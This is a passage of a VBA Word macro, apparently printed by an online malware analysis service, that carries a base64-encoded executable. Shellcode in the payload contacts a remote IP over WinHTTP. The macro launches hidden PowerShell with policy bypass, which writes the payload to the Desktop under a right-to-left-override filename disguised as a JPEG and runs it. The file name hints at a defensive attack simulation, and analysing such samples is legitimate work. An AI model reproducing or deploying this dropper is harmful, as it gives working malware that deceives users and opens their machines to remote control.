cAwYSTQMGESwCBgkDBhEoAyAAAgYgAwEOAg4DAAABAwAAGAQAAQEYBgACGBJBCAYAAgISQRgIAAMCEkEYHQUIAAMdBRJBGAgHAAMYEkEYGAcAAwgSQRgYBwACGBJBESgKAAUYGBgYERgRHAgABAIYGAgRFAoABQIYGB0FCBAYBwADGBEoAggFAAIJGAkGAAICGBAJCwAHGBgYCRgYCRAYBQABAR0OBQABEkEOAygADgMoAAIDCAAYCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAAAUBAAAAACkBACQ2ODhmNWIxZS1jYWE2LTRhYmUtYWRkZS1hNDVjNDRhYTdiZjAAAAwBAAcxLjA"
a = a & "uMC4wAABJAQAaLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjYBAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lEi5ORVQgRnJhbWV3b3JrIDQuNhEBAAEAVA4ETmFtZQVTdGFnZQAAAAAAAOAsm1gAAAAAAgAAABwBAACMRAAAjCYAAFJTRFNabs1g13CyR43LgpeKumVdAQAAAEM6XFVzZXJzXHQtcm9rbGF6XERvY3VtZW50c1xWaXN1YWwgU3R1ZGlvIDIwMTVcUHJvamVjdHNcVGVzdHNcVHJvalxvYmpcUmVsZWFzZVxUcm9qLnBkYgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASIPsSEiD5PBlTIskJWAAAABNi2QkGE2LZCQgTYskJE2LJCRNi2QkILqOTg7sTInh6DQCAADoDAAAAFdpbkh0dHAuZGxsAFn/0EmJxbq+bQLRTInp6BACAABIg+wwTTHJTTHAugEAAABEiUwkIOgCAQAATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAAMQAwAC4AMAA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAApACAAQQBwAHAAbABlAFcAZQBiAEsAaQB0AC8ANQAzADcALgAzADYAIAAoAEsASABUAE0ATAAsACAAbABpAGsAZQAgAEcAZQBjAGsAbwApACAAQwBoAHIAbwBtAGUALwA0ADIALgAwAC4AMgAzADEAMQAuADEAMwA1ACAAUwBhAGYAYQByAGkALwA1ADMANw"
a = a & "AuADMANgAgAEUAZABnAGUALwAxADIALgAyADQANgAAAAAAWf/QSYnEuo+uigBMieno4gAAAEyJ4eggAAAAMgAwADQALgA3ADkALgAxADkANwAuADIAMAAzAAAAAABaQbhQAAAARTHJ/9BJicS6weE0j0yJ6eieAAAATTHJSIPsQEyJTCQwTIlMJChNMclNMcBMiUwkIOgKAAAARwBFAFQAAAAAAFpMieH/0EmJxLqCiDSYTInp6F0AAABIg+xATTHJTIlMJDBNMcBMiUwkKEgx0kyJ4UyJTCQg/9BlTIskJWAAAABNi2QkGE2LZCQgTYskJE2LJCRNi2QkILqwSS3bTInh6A8AAABJicS5gO42AEyJ4P/Q6/RIMe29/////0mJzUmLRTxIIehNi7QFiAAAAEkh7k0B7k2LVhhJIepJi14gSCHrTAHrZ+NKSf/KSos0k0gh7kwB7jH/McD8rITAdAfBzw0Bx+v0Odd120mLXiRIIetMAesxyWZCiwxTSCHpSYteHEgh60wB60iLBItIIehMAejDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
a = a & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAEAAAACAAAIAYAAAAUAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAQABAAAAaAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAzAIAAJBgAAA8AgAAAAAAAAAAAAA8AjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAEAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAeAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAAyAAkAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAFQAcgBvAGoALgBlAHgAZQAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAADoACQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABUAHIAbwBqAC4AZQB4AGUAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAANxiAADqAQAA"
a = a & "AAAAAAAAAADvu788P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCIgc3RhbmRhbG9uZT0ieWVzIj8+DQoNCjxhc3NlbWJseSB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjEiIG1hbmlmZXN0VmVyc2lvbj0iMS4wIj4NCiAgPGFzc2VtYmx5SWRlbnRpdHkgdmVyc2lvbj0iMS4wLjAuMCIgbmFtZT0iTXlBcHBsaWNhdGlvbi5hcHAiLz4NCiAgPHRydXN0SW5mbyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjIiPg0KICAgIDxzZWN1cml0eT4NCiAgICAgIDxyZXF1ZXN0ZWRQcml2aWxlZ2VzIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MyI+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZlbD0iYXNJbnZva2VyIiB1aUFjY2Vzcz0iZmFsc2UiLz4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCjwvYXNzZW1ibHk+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
a = a & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
Set oShell = CreateObject("Wscript.Shell")
Dim strArgs, strArgs1, strArgs2
strArgs1 = "powershell.exe -W Hidden -Exec Bypass -Command cd /;" & _
"$file= [Convert]::FromBase64String([string]'"
strArgs2 = "');" & _
"$filename= 'WinATP-Intro-Backdoor'+[char]8238+'gpj.exe';" & _
"$desktop=[Environment]::GetFolderPath('Desktop');" & _
"$fullpath = Join-path $desktop $filename;" & _
"[io.file]::WriteAllBytes($fullpath,$file);" & _
"copy $fullpath $desktop;" & _
"start $fullpath;"
strArgs = strArgs1 & a & strArgs2
oShell.Run strArgs, 0, False
Else:
End If
End Sub
Attribute VB_Name = "NewMacros"
Sub Buga()
'
' Buga Macro
'
'
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.